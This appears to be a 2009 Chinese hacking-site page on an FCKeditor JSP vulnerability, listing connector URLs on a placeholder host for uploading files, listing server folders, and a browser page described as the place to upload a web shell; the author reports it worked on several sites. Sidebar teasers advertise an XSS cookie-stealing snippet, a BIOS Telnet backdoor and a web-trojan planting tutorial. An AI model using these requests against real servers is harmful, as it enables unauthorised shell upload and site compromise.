当前位置：代码网 > 服务器>网络安全>企业安全 > FCKeditor JSP版漏洞

FCKeditor JSP版漏洞

2009年04月20日 • 企业安全 •我要评论

FCKeditor JSP版漏洞FCKeditor的JSP版漏洞 http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F ... 09-04-20

                    
						fckeditor的jsp版漏洞 

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?command=fileupload&type=image&currentfolder=%2f 

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?command=getfoldersandfiles&type=image&currentfolder=%2f 
上传shell的地址: 
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/jsp/connector 
跟版本有关系.并不是百分百成功. 测试成功几个站. 
不能通杀.很遗憾. 

asp php XSS获取cookie的代码

asp php XSS获取cookie的代码<script>document.write('<img src="http://ur... [阅读全文]
黑客入侵网络的五十种方法

黑客入侵网络的五十种方法现在网上的攻击事件越来越多，黑客都是通过什么方法来攻击我们的呢？下面我们给大家总结了黑客入侵网络的五十种方法，让大家做到有备无患。 ... [阅读全文]
冰河暗涌防不胜防 BIOS下实现的Telnet后门

冰河暗涌防不胜防 BIOS下实现的Telnet后门该项目仅为实验性项目，主要目的是想隐藏一个Telnet后门在主板的BIOS内，并让其随着计算机系统及操作系统... [阅读全文]
实战讲解跨站入侵攻击

实战讲解跨站入侵攻击很多时候在企业网络安全，特别是服务器上数据库安全防范方面需要特别注意，弥补所有漏洞，减少因设置不当带来的入侵事件的发生。然而在实际使用与维护过程中我们经常会…

2008年10月08日 • 网络安全
网页挂马详细步骤教程

网页挂马详细步骤教程其实很简单的的，说到原理，就一个：就是在人家网站的主页那里插入一个自己的网马的页面，等有漏洞的人查看了人家网站的主页，那么他就成了你的肉鸡... [阅读全文]
关于趋势科技等网站被攻击的分析

关于趋势科技等网站被攻击的分析一. 首先在网上找到了这次攻击的新闻报道http://www.nsfocus.net/news/6697 http://hi.... [阅读全文]

发表评论


验证码：

FCKeditor JSP版漏洞

2009年04月20日 • 企业安全 •我要评论

相关文章:

实战讲解跨站入侵攻击

发表评论